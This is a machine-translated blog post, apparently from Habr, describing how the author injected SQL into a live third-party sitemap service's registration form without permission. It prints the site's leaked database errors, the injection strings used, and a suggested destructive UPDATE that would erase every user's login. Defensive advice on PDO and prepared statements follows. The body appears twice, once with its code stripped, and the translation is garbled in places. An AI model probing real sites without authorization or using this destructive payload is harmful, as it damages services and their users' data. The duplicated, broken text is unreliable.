The story of a single SQL injection
Good day!
I want to tell you how I hacked a large American sitemap site and remind you of protection against sql injections. The purpose of the post is for informational purposes only. But all in order.
For a number of my projects, I needed to generate a couple of sitemaps. I googled and, among other things, found one American service for creating sitemaps (where it was necessary to register). I quickly entered the left information (in the hope that there is no mail authentication on the site) and the address of the site for creating the sitemap. And he continued to do more important things forgetting about it for a couple of days.
And here I am again going to create a sitemap. I enter my data on the same site (already authentic), and the previously entered address of the site. As a result of the form processing, the site displays the text:
The text means that this site is already in the database. I had an idea, why not practice in the implementation of the sql code in order to make the Internet saferto train your hacker skill .
To begin with, I looked at the lack of verification of the text entered in the registration form for ,, cleanliness ,, this query:
')
The point is that I close the first part of the query:
Code:
And close the final console
Code:
Query result:
I received information:
passes normally.
In principle, everything is already clear, I can enter any code up to 125 characters in this line. Next is the question of fantasy, for example:
By removing this request all the logins of people.
I sent information about the hole to the site. The task is completed - now our information will be more secure.
Do not forget to check the validity of the text entered by the client.
UPD1:
Advice on using correct connections and SQL queries from imater and FanatPHP
Connect:
Process input text:
UPD2: Thanks to the zerkms comments, I want to remind you of the prepared statements :
Using prepared statements provides many benefits for both security and performance. Prepared statements can help improve security by separating the logic of the SQL query from the data inserted into it. This separation of logic and data can help prevent the injection of SQL injections. Usually, when you use queries that use data coming from users, you should be very careful. To do this, you use functions that escape problem characters, such as single and double quotes, backslash. These operations are not necessarily necessary when you use the prepared statements. Separating data from the SQL query logic allows MySQL to automatically process these characters and not resort to special functions.
Thank you for your attention. Do not judge strictly my first post.
I want to tell you how I hacked a large American sitemap site and remind you of protection against sql injections. The purpose of the post is for informational purposes only. But all in order.
Prehistory
For a number of my projects, I needed to generate a couple of sitemaps. I googled and, among other things, found one American service for creating sitemaps (where it was necessary to register). I quickly entered the left information (in the hope that there is no mail authentication on the site) and the address of the site for creating the sitemap. And he continued to do more important things forgetting about it for a couple of days.
First steps
And here I am again going to create a sitemap. I enter my data on the same site (already authentic), and the previously entered address of the site. As a result of the form processing, the site displays the text:
FATAL ERROR: Duplicate entry 'http://gnum.me/' for key 2 FATAL ERROR: query: INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, 'http://gnum.me/', 'fsga6a59.txt', '1','1','0','0','0', NOW()); The text means that this site is already in the database. I had an idea, why not practice in the implementation of the sql code in order to make the Internet safer
To begin with, I looked at the lack of verification of the text entered in the registration form for ,, cleanliness ,, this query:
', 'fsga6a59.txt', '1','1','0','0','0', NOW()); INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/ ')
The point is that I close the first part of the query:
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, ' Code:
', 'fsga6a59.txt', '1','1','0','0','0', NOW()); And close the final console
', 'fsga6a59.txt', '1','1','0','0','0', NOW()); Code:
INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178818, 'http://yg480ybv034df.me/ Query result:
FATAL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useup' at line 1 FATAL ERROR: query: INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178959, '', 'fsga6a59.txt', '1','1','0','0','0', NOW()); INSERT INTO site (userid, url, verifyfile, usetimestamp, usepriority, useupload, useping, usepingbing, createdate) VALUES (178817, 'http://yg480ybv034df.me/', 'fsgf47a8.txt', '1','1','0','0','0', NOW()); Result analysis
I received information:
- the text I entered does not have a check for malicious code;
- the creators of the site have limited the length (up to 125 characters), thus the request until:
load, useping, usepingbing, createdate) VALUES (178817, 'http://yg480ybv034df.me/', 'fsgf47a8.txt', '1','1','0','0','0', NOW()) passes normally.
Summary
In principle, everything is already clear, I can enter any code up to 125 characters in this line. Next is the question of fantasy, for example:
', 'fsga6a59.txt', '1','1','0','0','0', NOW()); UPDATE uses SET login=' ' By removing this request all the logins of people.
I sent information about the hole to the site. The task is completed - now our information will be more secure.
Do not forget to check the validity of the text entered by the client.
UPD1:
Advice on using correct connections and SQL queries from imater and FanatPHP
Connect:
$dsn = "mysql:dbname=$config[dbname]=;host=$config[host];charset=$config[charset]"; $conf = array( PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, ); $pdo = new PDO($dsn, $config["user"], $config["pass"], $conf); Process input text:
$query = $db2->prepare("SELECT * FROM tree WHERE text LIKE :title OR id = :id"); $query->execute(array(":title"=>"%24938239823908%", ":id"=>$_GET ['sync3'])); while ($sql = $query->fetch()) echo $sql['fio']; UPD2: Thanks to the zerkms comments, I want to remind you of the prepared statements :
Using prepared statements provides many benefits for both security and performance. Prepared statements can help improve security by separating the logic of the SQL query from the data inserted into it. This separation of logic and data can help prevent the injection of SQL injections. Usually, when you use queries that use data coming from users, you should be very careful. To do this, you use functions that escape problem characters, such as single and double quotes, backslash. These operations are not necessarily necessary when you use the prepared statements. Separating data from the SQL query logic allows MySQL to automatically process these characters and not resort to special functions.
Thank you for your attention. Do not judge strictly my first post.
Source: https://habr.com/ru/post/168079/
All Articles